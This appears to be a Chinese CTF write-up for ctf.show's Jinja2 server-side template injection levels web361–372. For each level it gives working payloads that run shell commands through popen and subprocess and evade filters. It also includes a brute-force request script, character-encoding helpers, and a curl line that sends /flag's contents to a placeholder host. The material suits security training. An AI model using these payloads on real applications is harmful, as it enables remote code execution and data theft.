无过滤的小脚本

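# Number the comma-separated entries of 1.txt, one "<index>:<entry>" per line,
# into 2.txt. Per the surrounding note, 1.txt is presumably a comma-separated
# class list, and the numbered output lets a name be located by its index.
with open("python/ssti/1.txt", "r") as f, open("python/ssti/2.txt", "w") as f1:
    # "r"/"w" are sufficient: the original "r+"/"w+" modes asked for write/read
    # access that was never used.
    lst = f.read().split(',')
    # enumerate() replaces the index-based loop; the output format is unchanged.
    f1.writelines(f"{i}:{item}\n" for i, item in enumerate(lst))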
这样会将每一个类都标明序号
然后用查找器查找'os'

lipsum

Jinja2 模板引擎中,lipsum 是一个内置的全局函数,用于生成 Lorem Ipsum 占位文本。它通常用于快速填充模板中的文本内容,方便前端开发和测试。

web361

没有任何过滤
?name={{"".__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']("cat /flag").read()}}

web362

过滤了部分数字2
?name={{[].__class__.__base__.__subclasses__()[140-8].__init__.__globals__['popen']('cat /flag').read()}}

web363

过滤了单双引号
?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__[request.args.a](request.args.b).read()}}&a=popen&b=cat /flag

web364

过滤了单双引号和args
?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__[request.values.a](request.values.b).read()}}&a=popen&b=cat /flag

web365

过滤了[]和args 
?name={{().__class__.__base__.__subclasses__().__getitem__(132).__init__.__globals__.__getitem__(request.values.a)(request.values.b).read()}}&a=popen&b=cat /flag

web366

过滤' " [ _
用了 .
?name={{lipsum.__globals__.os.popen(request.values.a).read()}}&a =cat /flag
?name={{(lipsum|attr(request.cookies.x)).os.popen(request.cookies.y).read()}}
cookie: x=globals;y=cat /flag


?name= {{()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)(1)|attr(request.values.d)()|attr(request.values.c)(407)(request.values.e, shell=True, stdout=-1)|attr(request.values.f)()|attr(request.values.c)(0)}} &a=class&b=mro&c=getitem&d=subclasses&e=cat /flag&f=communicate

web367

过滤了os
?name={{(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&a=__globals__&b=os&c=cat /flag

web368

过滤了request,但只是在{{}}中过滤了request,没有在{% %}中过滤request

?name={%print(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read() %}&a=__globals__&b=os&c=cat /flag

web369

{%%}中过滤了request
方法一 构造字符串
import requests

# Character-by-character search for the "{%%}" case: for each character of
# `payload`, probe indices i of (config|string|list).pop(i) until the page echoes
# the wanted character, then record that expression so the string can be built
# from `config` alone. Every probe is a separate HTTP request (up to 1000 per
# character), which is slow and very noisy in server logs.
url="http://url:8080/?name={{% print (config|string|list).pop({}).lower() %}}"
payload="cat /flag"
result=""
for j in payload:
    for i in range(0,1000):
        # The doubled braces are str.format escapes: the request carries
        # {% print (config|string|list).pop(i).lower() %}.
        r=requests.get(url=url.format(i))
        # NOTE(review): find() returns -1 when "<h3>" is absent, and the slice
        # below then silently reads r.text[3:4] instead of failing — the marker
        # is assumed to always be present in the response.
        location=r.text.find("<h3>")
        word=r.text[location+4:location+5]
        # Comparison is case-insensitive because the probe applies .lower().
        if word==j.lower():
            print("(config|string|list).pop(%d).lower() == %s"%(i,j))
            result+="(config|string|list).pop(%d).lower()~"%(i)
            break
# Drop the trailing "~" separator appended by the loop.
print(result[:len(result)-1])
方法二 set构造字符
http://de1d82f0-b40d-430f-9cb5-ce2435f44306.chall.ctf.show:8080/?name=
{% set a=(()|select|string|list).pop(24) %} // a = _
{% set globals=(a,a,dict(globals=1)|join,a,a)|join %} // globals=__globals__
//dict(globals=1)|join|print 输出是globals
{% set init=(a,a,dict(init=1)|join,a,a)|join %}
{% set builtins=(a,a,dict(builtins=1)|join,a,a)|join %}
{% set a=(lipsum|attr(globals)).get(builtins) %}
{% set chr=a.chr %}
{% print a.open(chr(47)~chr(102)~chr(108)~chr(97)~chr(103)).read() %}

web370

过滤了全部数字
用全角字符绕过
下面是转换脚本
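def half2full(half):
    """Convert half-width ASCII characters in *half* to their full-width forms.

    Printable ASCII (code points 33..126) is shifted by 0xFEE0 into the
    Halfwidth and Fullwidth Forms block, a plain space (32) becomes the
    ideographic space U+3000, and every other character is kept unchanged.

    Args:
        half: input string; may be empty.

    Returns:
        A new string of the same length with the characters converted.
    """
    def _convert(ch):
        code = ord(ch)
        if 33 <= code < 127:
            return chr(code + 0xfee0)
        if code == 32:
            return chr(0x3000)
        return ch

    # "".join over a generator replaces the quadratic `full += ch` loop.
    return "".join(_convert(ch) for ch in half)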
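# Interactive driver: keep prompting and print the full-width form of each
# input line. Runs until the process is interrupted (Ctrl-C) or input() hits
# EOF, exactly like the original `while 1:` loop.
while True:
    s = input("输入想要转换的数字字符串:")
    # half2full already walks the string character by character, so the
    # per-character loop that rebuilt `t` was redundant.
    print(half2full(s))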

payload
?name=
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(24)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
{% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}

web371

半角数字转全角
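def num2cn(num):
    """Shift every character of *num* by 65248 (0xFEE0) to its full-width form.

    Intended for ASCII digit strings ("47" -> "４７"). No range check is done,
    so characters outside printable ASCII are shifted as well.

    Args:
        num: input string; may be empty.

    Returns:
        The converted string, same length as *num*.
    """
    # "".join replaces the quadratic `res += chr(...)` loop.
    return "".join(chr(ord(ch) + 65248) for ch in num)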

字符串转 ASCII 码
def str2ascill(s):
    """Return, for each character of *s*, its decimal code point rendered in
    full-width digits via num2cn (e.g. "a" -> ["９７"])."""
    def _code(ch):
        return num2cn(str(ord(ch)))

    return list(map(_code, s))

# Encode the string as a list of full-width code-point strings (see str2ascill).
arr=(str2ascill("curl http://ip:port?p=`cat /flag`"))

# Join the codes into a Jinja2 expression "chr(…)~chr(…)~…"; "~" is the
# template string-concatenation operator, hence the trailing "~" on each term.
res=''
for i in arr: res+='chr({i})~'.format(i=i)

# Strip the trailing "~" left by the loop.
print(res[:len(res)-1])

web372

过滤了count
上一题payload可以接着用